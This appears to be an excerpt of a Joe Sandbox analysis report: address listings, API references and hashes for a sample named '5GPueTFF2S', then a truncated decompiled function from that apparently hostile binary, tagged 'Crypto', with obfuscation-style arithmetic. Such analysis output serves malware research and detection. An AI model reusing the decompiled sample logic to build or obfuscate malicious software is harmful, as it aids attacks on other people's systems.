                                              0x00ec6294
                                              0x00ec629c
                                              0x00ec629e
                                              0x00ec62a3
                                              0x00ec62a5
                                              0x00ec62b5
                                              0x00ec62b9
                                              0x00ec62cd
                                              0x00ec62cd
                                              0x00ec62d1
                                              0x00ec62dc
                                              0x00ec62df
                                              0x00ec62df
                                              0x00ec626c
                                              0x00ec627a
                                              0x00ec627a
                                              0x00ec62f0
                                              0x00ec62f6
                                              0x00ec6313
                                              0x00ec6323
                                              0x00ec632d
                                              0x00ec6332
                                              0x00ec633b
                                              0x00ec634a
                                              0x00ec6350
                                              0x00ec6352
                                              0x00ec6415
                                              0x00ec641b
                                              0x00ec6463
                                              0x00ec6465
                                              0x00ec6471
                                              0x00ec6483
                                              0x00ec648e
                                              0x00ec6496
                                              0x00ec64a2
                                              0x00ec64a7
                                              0x00ec64b8
                                              0x00ec64be
                                              0x00ec64bf
                                              0x00ec64c2
                                              0x00ec64e8
                                              0x00ec64e8
                                              0x00ec64ea
                                              0x00ec64ea
                                              0x00ec641d
                                              0x00ec6435
                                              0x00ec643b
                                              0x00ec644b
                                              0x00ec644b
                                              0x00ec6358
                                              0x00ec635b
                                              0x00ec635d
                                              0x00ec6363
                                              0x00ec6368
                                              0x00ec637a
                                              0x00ec637c
                                              0x00ec63eb
                                              0x00ec63f5
                                              0x00ec63fb
                                              0x00ec6404
                                              0x00ec6407
                                              0x00ec637e
                                              0x00ec639d
                                              0x00ec63af
                                              0x00ec63b8
                                              0x00ec63c3
                                              0x00ec63c6
                                              0x00ec63c9
                                              0x00ec63c9
                                              0x00ec637c
                                              0x00ec635d
                                              0x00ec64f8
                                              0x00ec650d
                                              0x00ec6513
                                              0x00ec6521
                                              0x00ec652a
                                              0x00ec652c
                                              0x00ec6530
                                              0x00ec6535
                                              0x00ec6537
                                              0x00ec653a
                                              0x00ec653c
                                              0x00ec6548
                                              0x00ec6549
                                              0x00ec6556
                                              0x00ec6568
                                              0x00ec656c
                                              0x00ec657f
                                              0x00ec6592
                                              0x00ec6592
                                              0x00ec6594
                                              0x00ec6594
                                              0x00ec65a3
                                              0x00ec65af
                                              0x00ec65b5
                                              0x00ec66c2
                                              0x00ec66cb
                                              0x00ec66ce
                                              0x00ec66dd
                                              0x00ec66e0
                                              0x00ec66eb
                                              0x00ec6700
                                              0x00ec6706
                                              0x00ec670c
                                              0x00ec670c
                                              0x00ec65bb
                                              0x00ec65c3
                                              0x00ec65c6
                                              0x00ec65c9
                                              0x00ec65cb
                                              0x00ec65d1
                                              0x00ec65d6
                                              0x00ec65dc
                                              0x00ec65fd
                                              0x00ec6600
                                              0x00ec6603
                                              0x00ec6604
                                              0x00ec660a
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec660c
                                              0x00ec660c
                                              0x00ec6616
                                              0x00ec6616
                                              0x00ec660e
                                              0x00ec660e
                                              0x00ec6614
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6614
                                              0x00ec660c
                                              0x00ec662b
                                              0x00ec6634
                                              0x00ec6636
                                              0x00ec6643
                                              0x00ec664d
                                              0x00ec6651
                                              0x00ec665c
                                              0x00ec6675
                                              0x00ec667a
                                              0x00ec6686
                                              0x00ec66a0
                                              0x00ec66b3
                                              0x00ec66b3
                                              0x00ec65de
                                              0x00ec65de
                                              0x00ec65ee
                                              0x00ec65f5
                                              0x00ec65e0
                                              0x00ec65e0
                                              0x00ec65e6
                                              0x00ec65ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec65ec
                                              0x00ec65de
                                              0x00ec65dc
                                              0x00ec65cb
                                              0x00ec6711
                                              0x00ec6717
                                              0x00ec6721
                                              0x00ec6727
                                              0x00ec6728
                                              0x00ec6729
                                              0x00ec672b
                                              0x00ec673a
                                              0x00ec673a
                                              0x00ec673a
                                              0x00ec672d
                                              0x00ec672d
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec672f
                                              0x00ec672f
                                              0x00ec6731
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6731
                                              0x00ec672d
                                              0x00ec6742
                                              0x00ec6746
                                              0x00ec6749
                                              0x00ec674b
                                              0x00ec6793
                                              0x00ec6796
                                              0x00ec674d
                                              0x00ec675a
                                              0x00ec6764
                                              0x00ec6767
                                              0x00ec676a
                                              0x00ec676e
                                              0x00ec6775
                                              0x00ec6775
                                              0x00ec677a
                                              0x00ec677b
                                              0x00ec677c
                                              0x00ec6780
                                              0x00ec6780
                                              0x00ec679f
                                              0x00ec67a5
                                              0x00ec67b1
                                              0x00ec67bf
                                              0x00ec67c5
                                              0x00ec67cb
                                              0x00ec67cd
                                              0x00ec67cd
                                              0x00ec681c
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68b6
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec699e
                                              0x00ec69a0
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec69f5
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a32
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6acb
                                              0x00ec6acb
                                              0x00ec6ace
                                              0x00ec6ad4
                                              0x00ec6ad6
                                              0x00ec6ae0
                                              0x00ec6ae6
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6afd
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6ad6
                                              0x00ec6ac7
                                              0x00ec6ac7
                                              0x00ec6ac9
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6ac9
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf3
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c72
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6eba
                                              0x00ec6eba
                                              0x00ec6ebd
                                              0x00ec6ec3
                                              0x00ec6ec5
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6ec5
                                              0x00ec6eb6
                                              0x00ec6eb6
                                              0x00ec6eb8
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6eb8
                                              0x00ec6eb4
                                              0x00ec6fa1
                                              0x00ec6fa1
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701c
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec702e
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7867
                                              0x00ec7872
                                              0x00ec7872
                                              0x00000000
                                              0x00ec5e62
                                              0x00ec5e67
                                              0x00ec5f2f
                                              0x00ec5f34
                                              0x00ec5f34
                                              0x00ec5f3c
                                              0x00ec5f3f
                                              0x00ec5f40
                                              0x00ec5f45
                                              0x00ec5f4b
                                              0x00ec5f4d
                                              0x00ec5f58
                                              0x00ec5f58
                                              0x00ec5f5f
                                              0x00ec5f65
                                              0x00ec5f6b
                                              0x00ec5f6e
                                              0x00ec5f70
                                              0x00ec5f72
                                              0x00ec5f74
                                              0x00ec5f7a
                                              0x00ec5f85
                                              0x00ec5f8e
                                              0x00ec5f9b
                                              0x00ec5fa1
                                              0x00ec5faa
                                              0x00ec5faf
                                              0x00ec5fb8
                                              0x00ec5fbe
                                              0x00ec5fc1
                                              0x00ec5fcb
                                              0x00ec5fcf
                                              0x00ec5f76
                                              0x00ec5f76
                                              0x00ec5f78
                                              0x00000000
                                              0x00000000
                                              0x00ec5f78
                                              0x00ec5f74
                                              0x00ec5f4f
                                              0x00ec5f4f
                                              0x00ec5f52
                                              0x00000000
                                              0x00000000
                                              0x00ec5f52
                                              0x00ec5fd2
                                              0x00ec5fd9
                                              0x00ec5fdf
                                              0x00ec5fdf
                                              0x00ec5fdf
                                              0x00000000
                                              0x00ec5e78
                                              0x00ec5e82
                                              0x00ec5e91
                                              0x00ec5ec1
                                              0x00ec5ec7
                                              0x00ec5fe8
                                              0x00ec5fe8
                                              0x00ec5fed
                                              0x00ec5ff2
                                              0x00ec5ffa
                                              0x00ec5ecd
                                              0x00ec5edc
                                              0x00ec5ee6
                                              0x00ec5eec
                                              0x00ec5efe
                                              0x00ec5f14
                                              0x00ec5f19
                                              0x00ec5f1c
                                              0x00ec5f21
                                              0x00ec5f26
                                              0x00ec5f2e
                                              0x00ec5f2e
                                              0x00ec5e93
                                              0x00ec5e9c
                                              0x00ec5ea5
                                              0x00ec5ea8
                                              0x00ec5eae
                                              0x00ec5eb3
                                              0x00ec5ec0
                                              0x00ec5ec0
                                              0x00ec5e91
                                              0x00ec5e67
                                              0x00ec5e5c
                                              0x00ec5cb7
                                              0x00ec5a8c

                                              APIs
                                              • _memset.LIBCMT ref: 00EC3B61
                                              • GetProcAddress.KERNEL32(00000001,GetTickCount), ref: 00EC3D09
                                              • KiUserExceptionDispatcher.NTDLL(?,00000004), ref: 00EC3D4B
                                              • CoInitialize.OLE32(00000000), ref: 00EC3DA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: AddressDispatcherExceptionInitializeProcUser_memset
                                              • String ID: %GR$>$D$GetCommandLineW$GetLastError$GetTickCount$Hh$L$N$SSh$T$TB$[$_$p$v$z$|
                                              • API String ID: 4292480052-2478312064
                                              • Opcode ID: f574905270c6cdba20e2d0cb027916ac60b658ee096b664c7437ca6fa089265e
                                              • Instruction ID: 4262de614f725e06457191d727c3b5f1f2e0a4830e9d05d74263893f1b4b8ea6
                                              • Opcode Fuzzy Hash: f574905270c6cdba20e2d0cb027916ac60b658ee096b664c7437ca6fa089265e
                                              • Instruction Fuzzy Hash: 4333D1749043998FCB26CF78D590BEDBBB1AF59340F1490AEE4C5A738DDA3A5A41CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC3F9A Relevance: 34.4, APIs: 14, Strings: 5, Instructions: 1161COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00EC3F9A(signed int __eax, long __ebx, signed int __ecx, void* __edx, void* __esi) {
				signed char _t1067;
				signed char _t1069;
				signed short _t1076;
				signed char _t1077;
				signed int _t1083;
				void* _t1096;
				signed int _t1099;
				signed int _t1100;
				signed int _t1103;
				signed char _t1114;
				signed short _t1115;
				signed int _t1118;
				signed int _t1126;
				long _t1128;
				signed int _t1129;
				signed int _t1136;
				signed int _t1144;
				signed int _t1147;
				signed int _t1150;
				signed int _t1153;
				signed int _t1164;
				signed int _t1168;
				void* _t1173;
				void* _t1175;
				signed int _t1176;
				signed short _t1182;
				signed char _t1183;
				signed int _t1184;
				signed short _t1188;
				signed int _t1190;
				signed int _t1194;
				signed int _t1197;
				signed int _t1201;
				signed int _t1203;
				signed short _t1206;
				signed int _t1208;
				signed char _t1213;
				WCHAR* _t1216;
				signed int _t1247;
				signed int _t1254;
				signed int _t1255;
				signed char _t1263;
				signed int _t1265;
				signed int _t1266;
				signed int _t1267;
				void* _t1268;
				signed int _t1276;
				char _t1284;
				char _t1285;
				void* _t1310;
				signed int _t1318;
				signed int _t1319;
				signed int _t1320;
				signed short _t1321;
				signed int _t1331;
				signed int _t1336;
				signed short _t1337;
				signed int _t1342;
				signed short _t1367;
				signed short _t1368;
				signed int _t1378;
				signed int _t1379;
				void* _t1387;
				signed int _t1399;
				signed int _t1400;
				signed int _t1402;
				signed int _t1405;
				signed short _t1408;
				signed int _t1412;
				signed int _t1418;
				signed int _t1419;
				signed int _t1420;
				signed int _t1422;
				signed int _t1425;
				signed short _t1426;
				signed int _t1428;
				signed int _t1431;
				void* _t1437;
				signed char _t1443;
				signed short _t1451;
				signed short _t1467;
				signed int _t1477;
				signed int _t1481;
				signed int _t1483;
				signed int _t1485;
				signed short _t1486;
				signed int _t1492;
				signed int _t1516;
				signed int _t1544;
				signed int _t1545;
				signed int _t1553;
				signed int _t1569;
				signed int _t1581;
				signed char _t1588;
				signed int _t1591;
				signed short _t1599;
				signed short _t1600;
				void* _t1602;
				signed int _t1604;
				signed int _t1607;
				signed short _t1611;
				signed short _t1621;
				signed int _t1624;
				signed int _t1630;
				signed short _t1632;
				signed char _t1648;
				signed char _t1653;
				char _t1657;
				signed int _t1660;
				signed short _t1665;
				signed int _t1668;
				signed short _t1674;
				signed int _t1681;
				signed char _t1688;
				signed int _t1693;
				signed short _t1702;
				signed int _t1708;
				signed short _t1710;
				signed int _t1711;
				signed int _t1719;
				signed int _t1720;
				void* _t1742;
				signed int _t1747;
				void* _t1748;
				signed int _t1750;
				signed int _t1752;
				signed int _t1754;
				void* _t1755;
				signed int _t1756;
				signed int _t1757;
				void* _t1758;
				short _t1760;
				signed int _t1762;
				signed char _t1764;
				long _t1765;
				signed int _t1766;
				long _t1785;
				signed int _t1787;
				signed short _t1790;
				signed int _t1791;
				signed int _t1793;
				signed int _t1799;
				signed int _t1808;
				signed int _t1809;
				signed int _t1827;
				signed int _t1833;
				signed int _t1837;
				signed int _t1840;
				signed int _t1861;
				signed int _t1862;
				signed int _t1865;
				signed int _t1908;
				signed char _t1915;
				signed int _t1924;
				signed int _t1927;
				signed int _t1928;
				signed int _t1929;
				char _t1940;
				unsigned int _t1951;
				signed short _t1962;
				signed short _t1964;
				signed int _t1966;
				signed int _t1996;
				signed int _t2000;
				signed int _t2002;
				signed int _t2015;
				signed int _t2019;
				signed int _t2028;
				signed int _t2030;
				signed int _t2032;
				signed int _t2047;
				signed int _t2049;
				signed int _t2051;
				signed int _t2056;
				signed short _t2057;
				signed int _t2079;
				signed int _t2086;
				signed int _t2091;
				signed int _t2094;
				char _t2103;
				signed int _t2107;
				signed int _t2117;
				signed int _t2120;
				signed int _t2121;
				signed char _t2126;
				signed int _t2128;
				signed int _t2130;
				signed short _t2134;
				signed int _t2138;
				signed int _t2143;
				signed int _t2145;
				signed int _t2147;
				signed int _t2167;
				signed int _t2170;
				signed int _t2196;
				signed int _t2202;
				signed int _t2216;
				signed int _t2217;
				signed int _t2218;
				signed int _t2224;
				signed int _t2225;
				signed int _t2235;
				signed int _t2236;
				signed char _t2238;
				signed int _t2242;
				signed int _t2248;
				signed short _t2250;
				signed int _t2259;
				signed int _t2267;
				signed char _t2270;
				signed int _t2272;
				signed int _t2273;
				signed int _t2276;
				signed int _t2281;
				signed int _t2287;
				signed int _t2301;
				signed int _t2305;
				long _t2306;
				signed int _t2317;
				signed int _t2323;
				long _t2324;
				signed char _t2327;
				signed int _t2328;
				signed int _t2334;
				signed int _t2335;
				signed int _t2340;
				short* _t2342;
				struct HINSTANCE__* _t2346;
				signed int _t2355;
				char _t2356;
				short _t2357;
				signed int _t2359;
				signed char _t2361;
				signed char _t2363;
				signed int _t2366;
				signed int _t2373;
				signed int _t2384;
				signed int _t2386;
				signed short _t2388;
				WCHAR* _t2389;
				signed int _t2406;
				signed int _t2409;
				signed int _t2411;
				signed int _t2415;
				signed int _t2417;
				signed short _t2418;
				signed int _t2421;
				struct HINSTANCE__* _t2428;
				signed int _t2432;
				signed int _t2436;
				signed int _t2442;
				signed int _t2443;
				signed int _t2455;
				signed int _t2458;
				signed int _t2460;
				signed int _t2462;
				signed int _t2464;
				signed int _t2469;
				signed int _t2470;
				signed int _t2471;
				signed short _t2474;
				long _t2482;
				signed int _t2486;
				signed int _t2488;
				signed int _t2491;
				signed int _t2497;
				signed int _t2503;
				signed int _t2508;
				signed int _t2516;
				signed int _t2517;
				signed int _t2527;
				signed int _t2538;
				signed int _t2541;
				signed int _t2542;
				signed int _t2545;
				signed int _t2572;
				signed int _t2581;
				signed int _t2596;
				signed int _t2600;
				long _t2602;
				signed int _t2606;
				unsigned int _t2615;
				signed int _t2622;
				long _t2629;
				signed char _t2636;
				signed int _t2638;
				signed short _t2648;
				signed int _t2649;
				signed int _t2661;
				signed char _t2664;
				struct HWND__* _t2665;
				signed int _t2669;
				signed int _t2679;
				signed short _t2685;
				signed int _t2687;
				signed int _t2691;
				signed int _t2694;
				signed int _t2701;
				signed int _t2703;
				signed int _t2709;
				signed short _t2711;
				signed int _t2712;
				signed int _t2713;
				signed int _t2714;
				signed int _t2717;
				signed int _t2727;
				signed int _t2731;
				signed int _t2733;
				void* _t2742;
				signed int _t2748;
				void* _t2749;
				void* _t2750;
				signed int _t2751;
				struct HINSTANCE__* _t2752;
				signed int _t2753;
				signed int _t2758;
				void* _t2759;
				signed int _t2761;
				signed int _t2766;
				signed int _t2767;
				signed int _t2768;
				signed int _t2769;
				signed int _t2774;
				signed int _t2775;
				void* _t2792;
				void* _t2796;
				void* _t2828;
				void* _t2829;
				void* _t2833;
				void* _t2838;
				void* _t2842;
				void* _t2869;
				void* _t2875;
				void* _t2885;

				asm("scasd");
				_t1067 = __eax ^ 0x00000010;
				_t1 = __esi + __ecx * 4 - 0x1f;
				 *_t1 =  *((intOrPtr*)(__esi + __ecx * 4 - 0x1f)) - __edx;
				_push(0xd7ae0ade);
				asm("popad");
				if ( *_t1 > 0) goto 0xec3f35;
				_t2270 =  *(_t2796 - 0x20);
				_push(_t2796);
				asm("loopne 0xffffffa3");
				 *(__ecx + 1) =  *(__ecx + 1) & _t2270;
				 *(_t2796 - 0xa4) = _t2270 - 0xef01;
				 *(_t2796 - 0x14) = _t1067;
				_t2272 =  *0x1215420;
				 *0x1000cc8 = _t2272;
				asm("cdq");
				 *0x1000ccc = __ebx;
				_t1760 =  *0x11a1ecc;
				_t1069 =  *0x1000c88; // 0xa666078f
				_t2713 = _t2272;
				_t2273 =  *0x1000c8c; // 0xfff500a5
				 *(_t2796 - 2) = ( *(_t2796 - 2) & 0x000000ff) -  *0x1000c94;
				_t2742 = 0x8e7;
				do {
					_t1069 = E00ECEE50(_t1760, _t2713, _t1069, _t2273);
					_t2742 = _t2742 - 1;
				} while (_t2742 != 0);
				 *0x1000c88 = _t1069;
				_t1785 =  *0x1000d00; // 0xfffff835
				 *0x1000c8c = _t2273;
				 *(_t2796 - 0x20) =  *(_t2796 - 0x14) + 0x3ac2;
				 *(_t2796 - 0x5c) = TlsGetValue(_t1785);
				_t2276 = 0 |  *(_t2796 - 0x5c) < 0x00000000;
				if(_t2276 != (0 |  *(_t2796 - 0x5c) - 0x00000054 < 0x00000000)) {
					_t1787 =  *0x1000cc0; // 0xffff970a
					asm("cdq");
					__eflags = _t1787 -  *0x1000c9e;
					if(_t1787 !=  *0x1000c9e) {
						L11:
						_t1076 = 0;
						__eflags = 0;
					} else {
						_t1757 =  *0x1000cc4; // 0xffffffff
						__eflags = _t1757 - _t2276;
						if(_t1757 != _t2276) {
							goto L11;
						} else {
							_t1076 = 1;
						}
					}
					_t2714 = 0;
					__eflags =  !( *0x1000c9f) - _t1076;
					if( !( *0x1000c9f) <= _t1076) {
						_t2709 =  *0x1000cf0; // 0xd43579fe
						_t1752 =  *0x1000cf4; // 0x2b91c
						asm("adc eax, edi");
						 *0x1000ce0 = _t2709 + 0x81b9960;
						_t2711 =  *0x1000c9c; // 0x250000d4
						 *0x1000ce4 = _t1752;
						_t2712 =  *0x1000cac; // 0x106b42
						M01000CB0 = M01000CB0 &  *0x1000cd4 & 0x0000ffff;
						 *0x1000c94 = 2;
						 *(_t2796 - 3) = ( *(_t2796 - 3) & 0x000000ff) + _t2711 + 0x79a4;
						_t1754 =  *0x1000ca8; // 0x7b8b5249
						_t1755 = E00ECEE50(_t1754, _t2712, 2, 0);
						_t1756 =  *0x1000c90; // 0xffff571c
						asm("cdq");
						_t2267 = _t1755 + _t1756;
						__eflags = _t2267;
						asm("adc esi, edx");
						 *0x1000ca8 = _t2267;
						 *0x1000cac = _t2712;
					}
				} else {
					_t1758 = 0x261;
					goto L6;
					L6:
					 *(_t2796 - 0x80) =  *(_t2796 - 0x80) + 1;
					_t1758 = _t1758 - 1;
					if(_t1758 != 0) {
						goto L6;
					} else {
						_t2714 = 0;
					}
				}
				 *(_t2796 - 0xa4) =  *(_t2796 - 0x14) + 0x7491;
				_t1077 = E00EC1700();
				 *0x1000c9f = _t1077;
				if(_t1077 >= 0) {
					_t1790 =  *0x1000c9c; // 0xd4
					 *(_t2796 - 0x2c) =  !( *(_t2796 - 2));
					 *0x1000c98 = _t1790;
				} else {
					 *(_t2796 - 0x5c) = 2;
					 *(_t2796 - 0x2c) = ( *(_t2796 - 0x2c) & 0x0000ffff) + ( *0x1000c9b & 0x000000ff ^ 0x00000048);
					_t2701 =  *(_t2796 - 0x8c);
					asm("cdq");
					asm("adc edx, esi");
					 *(_t2796 - 0x38) = _t2701 +  *(_t2796 - 0x38) +  *(_t2796 - 0x38);
					asm("adc edx, esi");
					 *(_t2796 - 0x34) = _t2701;
					_t1742 = ( *(_t2796 - 0x5c) & 0x0000ffff) - _t2714;
					 *0x1000c9b =  *(_t2796 - 0xa0);
					if(_t1742 == 0) {
						_t2703 =  *(_t2796 - 0x58);
						 *0x107e6a2 = _t2703;
						asm("cdq");
						 *0x1000d04 = _t2703;
						 *0x1000d00 =  *(_t2796 - 0xf) + 0xd3f4;
						_t2259 =  *(_t2796 - 0x90) - ( *(_t2796 - 0xc) & 0x000000ff);
						__eflags = _t2259;
						 *(_t2796 - 0xbc) = _t2714;
						if(_t2259 != 0) {
							_t1747 = 0;
							__eflags = 0;
						} else {
							_t1747 = _t2259 + 1;
						}
						 *0x1000cec =  *(_t2796 - 0x68) + _t1747;
					} else {
						_t1748 = _t1742 - 1;
						if(_t1748 == 0) {
							_t1750 =  *0x1000c9c; // 0xd4
							 *0x1000cb4 =  *(_t2796 - 4) +  *0x1000cd8;
							 *0x1000ce8 = _t1750;
							 *(_t2796 - 7) =  *(_t2796 - 7) ^  *0x1063470;
						} else {
							if(_t1748 == 1) {
								 *(_t2796 - 0x7c) =  *0x1215420;
							}
						}
					}
				}
				_t2281 =  *(_t2796 - 0x14) + 0x55;
				 *(_t2796 - 0x14) = _t2281;
				if( *(_t2796 - 1) == 0) {
					_t1791 =  *0x1000c88; // 0xa666078f
					_t1083 =  !( *(_t2796 - 1));
					asm("cdq");
					__eflags =  !0x00000000 - _t2281;
					_t1793 =  !(_t1791 & 0x00000044);
					if(__eflags > 0) {
						L36:
						__eflags =  *0x1000d20 - _t2714; // 0x530e
						if(__eflags != 0) {
							_t1719 =  *0x1000c84; // 0x52f68420
							asm("cdq");
							_t1720 = E00ECEE50(_t1719, _t2281, 0xceffe103, 0x6d836);
							 *0x1000cf4 = _t2281;
							 *0x1000cf0 = _t1720;
							 *(_t2796 - 9) = 8;
							_t2691 = (1 -  *0x1000c90) *  *0x1000cf8;
							_t2242 =  *0x1000ca4; // 0x9b27
							 *0x1000cf8 = _t2691;
							asm("cdq");
							asm("sbb edx, esi");
							asm("sbb edx, [0x1000cac]");
